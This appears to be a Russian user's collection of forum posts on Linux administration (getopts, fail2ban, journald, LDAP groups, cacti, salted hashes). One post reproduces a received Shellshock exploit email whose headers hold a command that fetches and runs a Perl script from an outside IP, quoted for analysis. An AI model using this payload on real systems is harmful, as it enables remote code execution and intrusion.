В openvz есть возможность получать шелл в контейнере с hardware node напрямую. То есть, в контейнере может не быть ни одной учётной записи, отключен root, нет ssh и даже нет сети. Возможно ли такое в других средствах виртуализации, например в kvm?
Может быть не смог правильно составить запрос, но в поиске не нашёл ничего по этому вопросу.
Если задать для getopts несколько параметров но при вызове пропустить значения, то для для предыдущего параметра значением будет название следующего:
$ cat bin/testbash.sh
#!/bin/bash
#
aaa=
bbb=
ccc=
ddd=
while getopts ":a:b:c:d:" scriptopt
do
case "${scriptopt}" in
a)
aaa="${OPTARG}"
;;
b)
bbb="${OPTARG}"
;;
c)
ccc="${OPTARG}"
;;
d)
ddd="${OPTARG}"
;;
:)
echo "Error"
exit 1
;;
esac
done
echo "
${aaa}
${bbb}
${ccc}
${ddd}
"
$ testbash.sh -a 111 -b 222 -c 333 -d 444
111
222
333
444
$ testbash.sh -a 111 -b 222 -c
Error
$ testbash.sh -a 111 -b 222 -c -d
111
222
-d
$
В принципе это не смертельно, но может я просто чего не понимаю?
В пустой системе запущен fail2ban и sshd. Через некоторое время fail2ban срабатывает. При этом в логе secure появляются записи о попытке авторизации:
( читать дальше... )
Одновременно с этим в логе fail2ban появляется довольно много записей на первый взгляд не относящихся к этому событию:
( читать дальше... )
То есть, fail2ban резолвит некие IP адреса. Мне не совсем понятно зачем он это делает и откуда он их берёт. Если это по делу то почему бы их не забанить заодно, если ни о чём то зачем он этим занимается? Вызывает сомнение то, что события идут почти одновременно.
Новые времена, новые веяния, новые технологии, бинарные логи, серьёзная магия. Скажите пожалуйста, это нормально?
# du -sh /var/log/journal/
4.0G /var/log/journal/
Это centos7, настройки как мне кажется из коробки (по крайней мере не помню чтобы я касался в системе чего либо кроме требуемого ПО).
Утилита slappasswd позволяет сгенерировать пароль, который далее можно использовать. При этом его можно солить или не солить. Результат конечно разный, без соли он неизменный, а с солью естественно меняется:
slappasswd -v -h {SHA} -s 123
{SHA}QL0AFWMIX8NRZTKeof9cXsvbvu8=
slappasswd -v -h {SHA} -s 123
{SHA}QL0AFWMIX8NRZTKeof9cXsvbvu8=
slappasswd -v -h {SSHA} -s 123
{SSHA}ALrzFTOK9O2xUxO/qkHGJZ7sMLfSCnA2
slappasswd -v -h {SSHA} -s 123
{SSHA}L1K5N1DrrFGpQyTakjHbzefyikX8puuF
Если такой посоленный пароль поместить в конфиг, то система сможет с ним работать.
Но мы получили каждый раз разные хеши. То есть соль была различной. При этом мы не задаём и затем не указываем в конфиге соль. То есть при проверке система возьмёт пароль, приложит неизвестное нечто, получит хеш и сравнит тем что хранится. Разве хеш не должен совпасть только в том случае если мы используем одну и ту же соль?
Как это работает? Соль содержится в солёном хеше?
Есть необходимость собрать компьютер для домашних бытовых задач. В первом приближении задачи следующие:
Если игры будут идти в wine то это очень хорошо, но запасной аэродром в виде офтопика обязателен. Под играми понимается в первую очередь Assassin’s Creed, но на что ещё ориентироваться не знаю. Соответственно есть ряд вопросов.
( читать дальше... )
PS: Результат: Собрал компьютер
Обратились с жалобой что страница не всегда отдаётся нормально. Иногда браузер отображает страницу, а иногда вместо этого или пусто или вывод следующего характера:
Date: ...
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.6.16
Conection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset="utf-8
26b8
<!DOCTYPE html>
<html lang="ru">
<head>
<meta charset="utf-8">
...
Скриншот: https://img-fotki.yandex.ru/get/6611/22277664.3/0_a4f78_57a58bfe_orig , на скриншоте хром.
То есть, браузер выводит сначала вывод http и затем вывод html. То же, что можно получить обратившись телнетом, с некоторыми отличиями:
$ telnet site.ru 80
Trying 1.2.3.4...
Connected to site.ru.
Escape character is '^]'.
GET / HTTP/1.0
host:site.ru
HTTP/1.1 200 OK
Date: Sat, 09 Jan 2016 09:52:08 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.6.16
Content-Length: 5876
Connection: close
Content-Type: text/html; charset=utf-8
<!DOCTYPE html>
<html lang="ru">
<head>
<meta charset="utf-8">
Жалоба была только на один сайт на хосте, и то который только сдаётся, в эксплуатации ещё не был. То есть какой либо статистики нет. Заметной загрузки на момент жалобы не наблюдалось.
В какую сторону стоит смотреть? Может быть в первом случае (из жалобы) что то неправильно в http заголовках?
Недоотдел остался без работы?
Ведёт переговоры с Cyanogen по поводу включения своего голосового помощника в состав операционной системы Cyanogen OS.
В некоторых странах знают и чтят свою историю. Например во Франции до сих пор отмечают день взятия Бастилии. Хотя это событие старше чем октябрьская революция в нашей, о которой у нас уже и позабыли все, а поди-ж ты, до сих пор помнят.
В нашей стране семьдесят лет назад тоже произошло историческое событие. Да так, что до сих пор у некоторых личностей пригорает. Вероятно они хотели бы чтобы это событие произошло наоборот.
Могу пожелать этим личностям только немного душевного спокойствия. Душевное спокойствие это очень важно в нашем бурном мире.
А всех остальных поздравляю с праздником.
Если при заполнении формы заполнить поле тега и нажать ввод то сообщение отправится.
Это ошибка или так было задумано? Возможно было бы лучше отправлять как при обычном редактировании, по Ctrl+Enter.
Гугль сделали: https://play.google.com/store/apps/details?id=com.google.samples.apps.cardboa...
Но запатентовать не успели: http://tass.ru/ekonomika/1775379
можно добавить к фильтрам трекера «без клуба»?
Вот мне кажется что надо на той башне надувного Симпсона поставить. А выкак считаете?
После перевода времени все графики в какти сдвинулись на час. Выглядит это так: http://img-fotki.yandex.ru/get/5101/22277664.3/0_9c35d_6796ce33_orig . График рисуется правильно, но с отставанием.
В системе время и часовой пояс указаны правильно, в php также. Последний проверен, как из командной строки так и через веб сервер, следующим, найденным на просторах интернет, скриптом:
<?php
echo "date - ".date("H:i");
echo "\n <br> \n";
echo "UTC date - ".gmdate("H:i");
echo "\n <br> \n";
$a = localtime();
echo "localtime - ".$a[2].":".$a[1];
echo "\n <br> \n";
echo "Set timezone to Europe/Moscow\n";
date_default_timezone_set("Europe/Moscow");
echo "date - ".date("H:i");
echo "\n <br> \n";
echo "UTC date - ".gmdate("H:i");
echo "\n <br> \n";
$a = localtime();
echo "localtime - ".$a[2].":".$a[1];
echo "\n <br> \n";
echo date_default_timezone_get();
?>
Вывод в браузере:
date - 10:47
UTC date - 07:47
localtime - 10:47
Set timezone to Europe/Moscow date - 10:47
UTC date - 07:47
localtime - 10:47
Europe/Moscow
Вывод при запуске вручную аналогичный.
На хосте с MySQL время также указано правильно, сам MySQL перезапущен. В частности например если в mediawiki внести правку то время правки будет верное.
Crontab также перезапущен и проверен. Его задания выполняются с правильным временем.
По видимому, проблема связана с rrd. Или при внесении туда данных, или при получении их оттуда. Но где ещё поискать — что то не могу представить...
Несколько дней назад обнаружил письмо, в котором явно делалась попытка проэксплуатировать недавнюю уязвимость в bash. По видимому, атака рассчитана на работу фильтров, в качестве которых могут быть shell скрипты.
Исходный вид письма:
From - Fri Oct 24 20:38:48 2014
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <support@mata.com>
Delivered-To: my.user.name@my.domain.name.net
Received: by mail.my.domain.name.net (Postfix)
id 1B8E6306033C; Fri, 24 Oct 2014 20:38:44 +0400 (MSK)
Delivered-To: root@mail.my.domain.name.net
Received: by mail.my.domain.name.net (Postfix, from userid 1001)
id 055493060D8A; Fri, 24 Oct 2014 20:38:43 +0400 (MSK)
Received: from sub.domain.my.domain.name.net (unknown [11.22.33.44])
by mail.my.domain.name.net (Postfix) with ESMTP id D3496306033C
for <root@mail.my.domain.name.net>; Fri, 24 Oct 2014 20:38:43 +0400 (MSK)
Received: from USER (u16850951.onlinehome-server.com [74.208.184.251])
by sub.domain.my.domain.name.net (8.14.4/8.14.4/Debian-2ubuntu2) with SMTP id s9OGPr2d018507
for <root@localhost>; Fri, 24 Oct 2014 20:25:55 +0400
Resent-Message-Id: <201410241625.s9OGPr2d018507@sub.domain.my.domain.name.net>
To: () {:;;};cd/tmp;curl.-sO.178.254.31.165/ex.txt;lwp-download.http: //178.254.31.165/ex.txt@mail.my.domain.name.net;,
wget.178.254.31.165/ex.txt@mail.my.domain.name.net;,
fetch.178.254.31.165/ex.txt@mail.my.domain.name.net;,
perl.ex.txt@mail.my.domain.name.net;,
rm.-fr.ex.*@mail.my.domain.name.net;;;;;;;;
References:() { :; }; cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget 178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*;
Cc: () {:;;};cd/tmp;curl.-sO.178.254.31.165/ex.txt;lwp-download.http: //178.254.31.165/ex.txt@mail.my.domain.name.net;,
wget.178.254.31.165/ex.txt@mail.my.domain.name.net;,
fetch.178.254.31.165/ex.txt@mail.my.domain.name.net;,
perl.ex.txt@mail.my.domain.name.net;,
rm.-fr.ex.*@mail.my.domain.name.net;;;;;;;;
From: () {:;;};cd/tmp;curl.-sO.178.254.31.165/ex.txt;lwp-download.http: //178.254.31.165/ex.txt@mail.my.domain.name.net;,
wget.178.254.31.165/ex.txt@mail.my.domain.name.net;,
fetch.178.254.31.165/ex.txt@mail.my.domain.name.net;,
perl.ex.txt@mail.my.domain.name.net;,
rm.-fr.ex.*@mail.my.domain.name.net;;;;;;;;
Subject:() { :; }; cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget 178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*;
Date:() { :; }; cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget 178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*;
Message-ID:() { :; }; cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget 178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*;
Comments:() { :; }; cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget 178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*;
Keywords:() { :; }; cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget 178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*;
Resent-Date:() { :; }; cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget 178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*;
Resent-From: () {:;;};cd/tmp;curl.-sO.178.254.31.165/ex.txt;lwp-download.http: //178.254.31.165/ex.txt@mail.my.domain.name.net;,
wget.178.254.31.165/ex.txt@mail.my.domain.name.net;,
fetch.178.254.31.165/ex.txt@mail.my.domain.name.net;,
perl.ex.txt@mail.my.domain.name.net;,
rm.-fr.ex.*@mail.my.domain.name.net;;;;;;;;
В более удобочитаемом виде:
Return-Path: <support@mata.com>
Delivered-To: my.user.name@my.domain.name.net
Received:
by mail.my.domain.name.net (Postfix)
id 1B8E6306033C;
Fri, 24 Oct 2014 20:38:44 +0400 (MSK)
Delivered-To: root@mail.my.domain.name.net
Received:
by mail.my.domain.name.net (Postfix, from userid 1001)
id 055493060D8A;
Fri, 24 Oct 2014 20:38:43 +0400 (MSK)
Received:
from sub.domain.my.domain.name.net (unknown [11.22.33.44])
by mail.my.domain.name.net (Postfix) with ESMTP
id D3496306033C
for <root@mail.my.domain.name.net>;
Fri, 24 Oct 2014 20:38:43 +0400 (MSK)
Received:
from USER (u16850951.onlinehome-server.com [74.208.184.251])
by sub.domain.my.domain.name.net (8.14.4/8.14.4/Debian-2ubuntu2) with SMTP
id s9OGPr2d018507
for <root@localhost>;
Fri, 24 Oct 2014 20:25:55 +0400
Resent-Message-Id: <201410241625.s9OGPr2d018507@sub.domain.my.domain.name.net>
Здесь мы можем видеть малоинформативный support@mata.com и не намного более информативный u16850951.onlinehome-server.com [74.208.184.251], с которого было отправлено письмо.
Заголовки:
To:
From:
Resent-From:
содержат следующее:
To: () {:;;};
cd/tmp;
curl.-sO.178.254.31.165/ex.txt;
lwp-download.http: //178.254.31.165/ex.txt@mail.my.domain.name.net;,
wget.178.254.31.165/ex.txt@mail.my.domain.name.net;,
fetch.178.254.31.165/ex.txt@mail.my.domain.name.net;,
perl.ex.txt@mail.my.domain.name.net;,
rm.-fr.ex.*@mail.my.domain.name.net;;;;;;;;
Здесь мы можем видеть 178.254.31.165/ на котором файла ex.txt конечно уже не было.
Заголовки:
References:
Subject:
Date:
Message-ID:
Comments:
Keywords:
Resent-Date:
содержат предыдущий случай, без добавленного к url домена:
References:() { :; };
cd /tmp ;
curl -sO 178.254.31.165/ex.txt;
lwp-download http://178.254.31.165/ex.txt;
wget 178.254.31.165/ex.txt;
fetch 178.254.31.165/ex.txt;
perl ex.txt;
rm -fr ex.*;
Перемещено beastie из admin
Пусть мы используем ldap. Пусть мы завели в нём несколько пользователей. Пусть также мы завели несколько групп, пусть они будут например posixGroup. И пусть теперь мы хотим авторизовывать пользователей в зависимости от принадлежности к той или иной группе.
Естественно мы пытаемся сделать запрос вроде такого:
(&(cn=TestGroup)(memberUid=user1))
Но оказывается что dma_k здесь: http://www.opennet.ru/base/net/ldap_search_filter.txt.html всё таки ошибся.
И во всех похожих случаях, а их можно встретить немало, оказывается что такого рода запрос невозможен. Во всех случаях, обсуждая похожую, в общем типичную, задачу, в результате приходят к тому что нужно использовать некий memberOf. Но для него есть несколько ограничений.
Во первых это наложение (Overlay), то есть этот функционал не входит в базовую поставку. Но даже если мы установим этот оверлей, окажется что к posixGroup он неприменим. И нужно либо пересаживать пользователей в другую группу, либо искать как скрестить memberOf и posixGroup (встречается описание и для этого).
И вот тут у меня возник вопрос. А для чего вообще нужны эти группы? Если их нельзя использовать по своему прямому назначению. Ну, по крайней мере мне кажется что это их прямое назначение: группировать пользователей. Потому что если звёзды зажигают^W^W эти группы существуют, то может быть всё таки существует какой нибудь естественный механизм их использования?
Вот тут недавно на форуме был задан вопрос примерно следующего характера:
какая оценка на ресурсы нужна для компьютера типа того, ...
главный герой изобрел и реализовал для спецслудб США мега-ИИ, который следит за жителями СШАшки с помощью уличных видеокамер, спутников и других устройств. Благодаря этой информации он может (как самый минимум) мгновенно искать любых людей и давать осмысленные комментарии о их перемещениях и занятиях. (Вообще, это полноценный ИИ, он много чего еще может по фильму, но это уже фантастика).
Наши сегодняшние рассуждения о вычислительной технике выглядят примерно как если в эпоху пара паровые гики сидели на своём консилиуме, за отсутствием нормального форума, и обсуждали как можно построить паровую машину которая обеспечит движением целый город.
Паровые машины в то время устанавливались централизованно: на фабрике стояла одна машина и от неё движение передавалось через валы и ремни на все станки в этом здании. И вот сидят наши парогики, и мечтают: как можно построить паровую машину, которая будет двигать механизмы в разных зданиях и ещё пассажирские экипажи по улицам заодно. И какова должна быть мощность такой машины.
Что характерно, примерно так и получилось. Вон, за окном ТЭЦ дымит. И передаёт движение на механизмы в разных цехах разных фабрик и даже на пассажирские экипажи на улицах, как на рельсовые так и на безрельсовые. Правда не валами и ремнями, а по неподвижным проволочкам. И машина там уже не совсем паровая. Но в целом похоже. И действительно мощная машина там стоит, кстати. Но с другой стороны на концах проволочек не просто снимается движение а тоже своего рода машины, маленькие. Так что вроде и не очень похоже.
Так вот к распознаванию. Как известно, распознавание изображения в нашей нервной системе начинается с момента регистрации фотона на сетчатке. В некотором роде, сетчатка сама является вынесенной частью мозга. И по дороге из глаза (периферии) в мозг (основную часть) информация уже обрабатывается и до места доходит уже далеко не растровое изображение, а может быть даже не векторное, а может быть уже и не совсем изображение. Короче с нашим зрением примерно как сейчас с машинами (электрическими), только задом-наперёд: на краю мелкая машина (глаз) которая тоже работает, а в центре большая машина (мозг) привязанная к предыдущей проволоками.
Но вот только электронно-вычислительная техника у нас на сегодня пока работает как с машинами в старину (паровыми), только тоже задом-наперёд: с периферии данные (как до этого движение) тупо и механически механически передаются в центр.
Так вот попробуем как те паровые гики посмотреть в будущее. А не будет ли разумно начать предобработку прямо на камере? Это не только снизит загрузку сети, но и разгрузит центральное устройство. Можно конечно возразить что микрокомпьютер, который можно прикрутить к камере, много не распознает. Но на деле мощность современной вычислительной техники уже довольно велика. Так же, как была велика мощность паровых машин. У них КПД был не велик. Как и у наших вычислителей. Но это дело поправимое. Тут всего-то что надо, это определиться во что распознавать изображение. А если с этим внутренним языком для распознанного изображения разберёшься, то на нём и всё остальное напишется.
Короче, tl;dr: современных мощностей для такой постапокалиптически-киберпанковской картины хватит за глаза. Можно начинать строить.
PS: 
stevejobs
PPS: кстати, а почему это а заглавии кавычки не заменяются?
То не нужно спешить его менять. Иногда достаточно просто wipe cache partition.
Кто сказал чистилка реестра?
| ← назад | следующие → |